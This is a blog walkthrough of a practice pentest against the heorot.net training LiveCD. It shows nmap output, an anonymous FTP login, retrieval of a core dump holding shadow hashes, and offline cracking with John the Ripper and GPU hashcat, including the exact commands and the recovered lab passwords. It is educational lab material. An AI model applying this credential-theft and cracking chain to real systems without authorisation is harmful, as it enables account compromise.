Recovering hashes using GPU

Recently I have been learning pentesting using a LiveCD which can be downloaded from heorot.net, in my opinion heorot.net has done a great favour for us learning pentesting by creating safe targets to learn and practise.

I need to thank g0tmi1k for sharing the walkthrough.

Understanding the liveCD

map scan report for 192.168.1.110
Host is up (0.00053s latency).
Scanned at 2012-01-26 17:07:16 SGT for 9s
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.4
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open ipp CUPS 1.1

From the preliminary reconnaissance I have learned that the liveCD can be accessed in several way i.e. ssh, ftp and http.

Exploring ftp

root@bt:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

The ftp allows anonymous login without password. Now I will need to explore the liveCD through ftp.

from /download/etc/

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 6 1000 513 340 Mar 15 2007 .
drwxr-xr-x 7 1000 513 160 Mar 15 2007 ..
drwxr-xr-x 4 1000 513 160 Mar 15 2007 X11
-rw-r–r– 1 1000 513 362436 Mar 03 2007 core
drwxr-xr-x 2 1000 513 100 Mar 15 2007 fonts
-rw-r–r– 1 1000 513 780 Apr 30 2005 hosts
-rw-r–r– 1 1000 513 718 Jul 03 2005 inputrc
-rw-r–r– 1 1000 513 1296 Jun 10 2006 issue
-rw-r–r– 1 1000 513 183 Jun 23 2005 lisarc
-rw-r–r– 1 1000 513 56 Oct 21 2004 localtime
lrwxrwxrwx 1 1000 513 23 Jan 26 07:15 localtime-copied-from -> /usr/share/zoneinfo/GMT
-rw-r–r– 1 1000 513 10289 Dec 31 2003 login.defs
-rw-r–r– 1 1000 513 1 Dec 31 2003 motd-slax
drwxr-xr-x 2 1000 513 100 Mar 15 2007 profile.d
drwxr-xr-x 2 1000 513 220 Mar 15 2007 rc.d
-rw-r–r– 1 1000 513 440 Jul 18 2006 shadow
226 Directory send OK.
ftp>

There are two files which should not be released to public, those files were bold as above. The core file is actually the core dump which also contains the password hashes of the liveCD.

Download the core dump

ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.02 secs (15004.5 kB/s)

ftp> bye
221 Goodbye.

The core dump files contain numerous unreadable characters by the text editor, so I use strings command to make it readable:

command: strings core

<truncated output, the hash resides at the end of file>

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Arrange the usernames and hashes line by line.

I have created a shadow.txt file and arranged and stored the hashes and usernames:

root@bt:~# cat /home/tmp/shadow.txt
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Many walkthroughs use john the ripper, JTR is a great cracking tool, it can also crack FreeBSD MD5 hashes, however the speed of cracking with a good wordlist is extremely slow, I waited for more than 5 hours and still not even one password was found. Here’s how I did it:

root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john#

root@bt:/pentest/passwords/john# ./john –wordlist=/pentest/passwords/wordlists/wordlist.txt –rules /home/tmp/shadow.txt
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [8x])
Remaining 1 password hash

This process is extremely long not because of jtr but because it is using CPU calculation the character per second is 1700:

guesses: 0 time: 0:00:00:53 0.53% (ETA: Thu Jan 26 20:07:19 2012) c/s: 1728 trying: fibulocalcaneal – fichi

This will take forever….

Hash / password cracking using GPU power

Previously I took several hours to install the nvidia drivers, the main reason I took several hours and determined to sort this out is I want to utilize and witness how GPU can significantly speed up the process. The tool I used cudaHashcat64. Note that oclHashcat64 is for ATI chipset and cudaHashcat64 is for Nvidia.

For this I touch another file known as shadow.hash where I only include salted hashes:

root@bt:/pentest/passwords/oclhashcat+# cat /home/tmp/shadow.hash
$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30
$1$klZ09iws$fQDiqXfQXBErilgdRyogn.
$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1
$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/

The sequence of the lines of hashes is not changed so that I can relate the result back with the usernames in shadow.txt.

root@bt:/pentest/passwords/oclhashcat+# ./cudaHashcat-plus64.bin -m 500 -o /home/tmp/cracked.txt /home/tmp/shadow.hash /pentest/passwords/wordlists/wordlist.txt -r rules/toggles1.rule

-m 500 : this define hash type, type 500 is FreeBSD MD5

-o : file to output.

-r : rules.

Followed by hash file and dictionary file.

cudaHashcat-plus v0.07 by atom starting…

Hashes: 4
Unique salts: 4
Unique digests: 4
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 15
GPU-Loops: 64
GPU-Accel: 1
Password lengths range: 1 – 15
Platform: NVidia compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: GeForce G210M, 511MB, 1468Mhz, 2MCU
Device #1: Allocating 0MB host-memory
Device #1: Kernel ./kernels/4318/m0500.sm_12.64.cubin

Scanned dictionary /pentest/passwords/wordlists/wordlist.txt: 3453259 bytes, 306319 words, 4594785 keyspace, starting attack…

Status…….: Running
Input.Mode…: File (/pentest/passwords/wordlists/wordlist.txt)
Hash.Type….: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 1 min, 25 secs
Time.Left….: 11 mins, 23 secs
Time.Util….: 85138.4ms/122.1ms Real/CPU, 0.1% idle
Speed……..: 22924 c/s Real, 22944 c/s GPU
Recovered….: 0/4 Digests, 0/4 Salts
Progress…..: 3347096/18379140 (18.21%)
Rejected…..: 1395352/3347096 (41.69%)
HW.Monitor.#1: 0% GPU, 65c Temp

Notice the speed! 22000 characters per second as compared with cracking using CPU power with JTR.

Increase the number of threads

root@bt:/pentest/passwords/oclhashcat+# ./cudaHashcat-plus64.bin -m 500 -o /home/tmp/cracked.txt /home/tmp/shadow.hash /pentest/passwords/wordlists/wordlist.txt -r rules/combinator.rule -n 160

-n 160 : Accelerate by 160 threads.

Hashes: 4
Unique salts: 4
Unique digests: 4
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 40
GPU-Loops: 64
GPU-Accel: 160
Password lengths range: 1 – 15
Platform: NVidia compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: GeForce G210M, 511MB, 1468Mhz, 2MCU
Device #1: Allocating 48MB host-memory
Device #1: Kernel ./kernels/4318/m0500.sm_12.64.cubin

Status…….: Running
Input.Mode…: File (/pentest/passwords/wordlists/wordlist.txt)
Hash.Type….: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 1 min, 15 secs
Time.Left….: 23 mins, 15 secs
Time.Util….: 75939.1ms/229.8ms Real/CPU, 0.3% idle
Speed……..: 33442 c/s Real, 34407 c/s GPU
Recovered….: 0/4 Digests, 0/4 Salts
Progress…..: 2944068/49011040 (6.01%)
Rejected…..: 404548/2944068 (13.74%)
HW.Monitor.#1: 0% GPU, 68c Temp

Notice the speed has increased by 10000 c/s. With a good wordlist cracking time can be reduced significantly.

Status…….: Exhausted
Input.Mode…: File (/pentest/passwords/wordlists/wordlist.txt)
Hash.Type….: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 17 mins, 24 secs
Time.Left….: 0 secs
Time.Util….: 1044021.4ms/2808.8ms Real/CPU, 0.3% idle
Speed……..: 34497 c/s Real, 34464 c/s GPU
Recovered….: 2/4 Digests, 2/4 Salts
Progress…..: 49011040/49011040 (100.00%)
Rejected…..: 12995029/49011040 (26.51%)
HW.Monitor.#1: 0% GPU, 65c Temp

Started: Thu Jan 26 17:41:38 2012
Stopped: Thu Jan 26 17:59:04 2012

Hashcat plus took 17mins using GPU, from my own wordlist I could recover half of the hash and salt.

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:Diatomaceous

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:Zymurgy

No root password in my wordlist I guess….:)

Using the darkcode list I could recover the root password:

Status…….: Exhausted
Input.Mode…: File (/pentest/passwords/wordlists/darkc0de.lst)
Hash.Type….: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 53 mins, 1 sec
Time.Left….: 0 secs
Time.Util….: 3181609.8ms/14450.3ms Real/CPU, 0.5% idle
Speed……..: 34520 c/s Real, 34628 c/s GPU
Recovered….: 3/4 Digests, 3/4 Salts
Progress…..: 273220960/273220960 (100.00%)
Rejected…..: 163391085/273220960 (59.80%)
HW.Monitor.#1: 0% GPU, 64c Temp

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:Complexity

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:Zymurgy

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:Diatomaceous

Advertisements
This entry was posted in Security and tagged , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s